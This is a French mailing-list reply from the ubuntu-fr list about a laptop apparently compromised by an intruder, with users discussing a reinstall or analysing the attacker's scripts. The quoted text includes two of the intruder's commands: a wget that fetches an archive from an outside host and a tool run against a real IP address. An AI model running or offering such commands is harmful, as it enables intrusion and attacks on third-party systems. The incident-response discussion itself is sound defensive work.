Re: Sécurité Compromise dans UBUNTU dapper???

[Free Mind]

On 3/27/06, L. Boggio <l.boggio.kubuntu-fr at adonf.info> wrote:
>
> Le 27/03/06, Free Mind a dit :
>
> > Ma machine c'est mon portable perso qui me sert pour toutes sortes de
> > tests.  Je sais pour la dapper en production... mais j'aime bien avoir
> les
> > dernières version des logiciels aussi.
>
> Bon, désolé, mais avec ces 2 lignes :
>
> wget http://rooot.xhost.ro/fld.tgz
> et
> ./x 200.68.192.253 53 0
>
> On a la preuve qu'il a téléchargé un programme et qu'il l'a exécuté,
> donc, tu ne peux pas savoir ce qu'il a fait.
> De ce fait, tu ne peux plus rien croire dans ta machine : LS a pu être
> remplécé, PS a pu être remplacé, etc...
> Si tu es parano et/ou que tu as des choses sensibles, la SEULE solution
> sure est la réinstallation après formatage de ta machine :(



Je pense que je l'ai interrompu et qu'il était au début du processus et en
effet, les scripts sont lisibles... donc je vais plutôt tenter d'analyser ce
qu'il y a la dedans.

Oui je sais lire le C et un peu de bash.

Pas beaucoup Perl par contre...

Et je doute qu'il a pu passer root selon les petites recherches que j'ai
fait donc remplacer ls etc... j'ai un fort doute.
-------------- section suivante --------------
Une pièce jointe HTML a été nettoyée...
URL: <https://lists.ubuntu.com/archives/ubuntu-fr/attachments/20060327/eeae8e1b/attachment.html>